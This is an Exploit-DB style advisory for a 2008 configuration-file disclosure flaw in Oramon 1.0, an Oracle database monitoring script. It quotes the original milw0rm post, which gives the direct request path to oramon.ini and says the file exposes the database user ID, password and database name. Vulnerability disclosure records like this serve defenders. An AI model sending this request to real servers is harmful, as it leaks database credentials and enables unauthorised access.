Bypass Config Download Vulnerability

vendor:

Oramon

by:

ahmadbady

7.5

CVSS

HIGH

Bypass Config Download Vulnerability

N/A

CWE

Product Name: Oramon

Affected Version From: Oramon 1.0

Affected Version To: Oramon 1.0

Patch Exists: YES

Related CWE: N/A

CPE: a:oramon:oramon

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Windows, Linux, Mac

2008

Bypass Config Download Vulnerability

Oramon is vulnerable to a bypass config download vulnerability. This vulnerability allows an attacker to download the configuration file of the application, which contains the database username and password. This vulnerability is due to the fact that the application does not properly validate user-supplied input. An attacker can exploit this vulnerability by directly requesting the configuration file.

Mitigation:

The vendor has released a patch to address this vulnerability.

Source

Exploit-DB raw data:

........................

..............................................
+++++Bypass Config Download Vulnerability+++++
...............................................

script:Oramon = Oracle Database Monitoring

++++++++++++++++++++++++++++++++++++++++++++++++++++++++
download:http://www.oramon.org/downloads/oramon.tar.gz

++++++++++++++++++++++++++++++++++++++++++++++++++++++++
expl:

$USERID=
$PASSWORD=
$DATABASE=

www.site.com/path/config/oramon.ini

   
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
  | | | | | |
Author: ahmadbady  
  | | | | | |
my mail: kivi_hacker666@yahoo.com | | | | | |
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

# milw0rm.com [2008-11-29]